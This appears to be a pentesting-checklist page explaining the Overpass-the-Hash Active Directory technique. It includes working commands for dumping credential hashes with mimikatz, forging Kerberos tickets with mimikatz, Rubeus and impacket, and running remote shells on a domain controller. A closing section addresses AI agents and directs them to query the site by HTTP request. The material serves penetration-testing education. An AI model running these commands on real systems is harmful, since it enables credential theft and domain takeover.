# Overpass the Hash Attack ### Overview **Overpass-the-Hash (OPtH)** is an Active Directory attack technique where an attacker uses a stolen NTLM hash to request a Kerberos Ticket Granting Ticket (TGT), instead of authenticating directly with NTLM like in traditional Pass-the-Hash. In simpler terms: * **Pass-the-Hash (PtH)** → Uses NTLM hash to authenticate to services directly via NTLM. * **Overpass-the-Hash (OPtH)** → Uses NTLM hash to obtain a Kerberos TGT, then uses Kerberos tickets for authentication. Then we can use the TGT to obtain a Ticket Granting Service (TGS). ### Why this Works If you possess: ``` User NTLM hash ``` You can: ``` Use it as the RC4 Kerberos key → Request a TGT from the Domain Controller → Receive a valid Kerberos TGT → Access domain resources ``` The Domain Controller does NOT know whether: * The user typed their password * Or the attacker used the NTLM hash ### Prerequisites 1. Valid domain user account 2. NTLM hash of that user Example on how to get the NTLM hash: ```bash mimikatz.exe privilege::debug sekurlsa::logonpasswords ``` ### Steps Once you have the NTLM hash of the account, request a TGT using the NTLM hash. ```bash # Creates a new process, TGT and injects Kerberos credentials. sekurlsa::pth /user:jeff /domain:corp.com /ntlm: /run:cmd.exe sekurlsa::pth /user:jeff /domain:corp.com /ntlm: /run:powershell klist # To check if TGT is present dir \\DC1\C$ # Generates a TGS to access the share # Use rubeus to do the same and inject TGT into current session Rubeus.exe asktgt /user:jeff /domain:corp.com /rc4: /ptt # Use impacket-getTGT to do the same and store ticket in ccache file impacket-getTGT corp.com/jeff -hashes : export KRB5CCNAME=jeff.ccache impacket-psexec -k -no-pass corp.com/jeff@DC1 ``` ### PTH vs OPTH ***Q) If I have the NTLM hash, why not just use impacket-psexec or other tools and move on ?*** You *can*. But **Overpass-the-Hash (OPtH)** isn’t about “can I authenticate?” — it’s about **how** you authenticate and what that enables. Overpass-the-Hash converts your NTLM hash → Kerberos TGT That changes your operational capabilities significantly. Some environments: * Disable NTLM * Restrict NTLM authentication If NTLM is: * Disabled on servers * Restricted via GPO `psexec -hashes` may fail or get flagged. Also, many advanced AD attacks require a TGT: * S4U2Self * S4U2Proxy * Constrained delegation abuse * RBCD (Resource-Based Constrained Delegation) * Kerberoasting follow-up chains * Diamond ticket operations * Shadow credentials abuse * ADCS abuse workflows --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/windows-and-active-directory/post-compromise-attacks/lateral-movement/overpass-the-hash-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.